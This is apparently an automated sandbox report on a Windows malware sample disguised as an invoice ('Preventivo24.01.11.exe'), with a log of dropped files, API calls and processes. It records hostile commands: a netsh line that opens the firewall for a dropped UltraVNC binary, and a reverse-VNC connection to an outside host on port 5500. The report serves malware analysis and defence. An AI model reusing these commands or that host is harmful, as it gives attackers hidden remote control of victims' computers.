Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeCode function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle,
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 402
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6E82.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dllJump to dropped file
Source: C:\Games\taskhost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Games\viewer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\viewer.exeAPI coverage: 5.2 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 8544Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8964Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9112Thread sleep count: 171 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8212Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8260Thread sleep count: 166 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE3210 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3C10 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,
Source: C:\Games\taskhost.exeCode function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01087833 VirtualQuery,GetSystemInfo,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\
Source: viewer.exe, 0000002A.00000002.1871973925.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCZ
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: , (Hyper-V Server)
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF6910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,
Source: C:\Games\taskhost.exeCode function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108A1CE mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010A4796 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010A47DA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01095EA4 mov ecx, dword ptr fs:[00000030h]
Source: C:\Games\viewer.exeCode function: 6_2_0064B9CA mov eax, dword ptr fs:[00000030h]
Source: C:\Games\viewer.exeCode function: 6_2_00643C84 mov eax, dword ptr fs:[00000030h]
Source: C:\Games\taskhost.exeCode function: 41_2_001DC838 mov eax, dword ptr fs:[00000030h]
Source: C:\Games\taskhost.exeCode function: 41_2_001CD615 mov ecx, dword ptr fs:[00000030h]
Source: C:\Games\taskhost.exeCode function: 41_2_001DC7F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108A23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EC2520 __set_se_translator,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108ACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EC5180 __set_se_translator,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\viewer.exeCode function: 6_2_00635248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\viewer.exeCode function: 6_2_00639256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\viewer.exeCode function: 6_2_006353DE SetUnhandledExceptionFilter,
Source: C:\Games\viewer.exeCode function: 6_2_006347F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Games\taskhost.exeCode function: 41_2_001BC87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\taskhost.exeCode function: 41_2_001B8A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Games\viewer.exeCode function: 6_2_00615210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop,
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FB9280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
Source: C:\Games\viewer.exeCode function: 6_2_00635448 cpuid
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,
Source: C:\Games\viewer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Games\viewer.exeCode function: GetLocaleInfoEx,___wcsnicmp_ascii,
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,
Source: C:\Games\viewer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01003AD0 CreateNamedPipeW,CreateFileW,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF6820 GetLocalTime,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01002440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,
Source: C:\Games\viewer.exeCode function: 6_2_00648AB4 _free,GetTimeZoneInformation,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E87AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
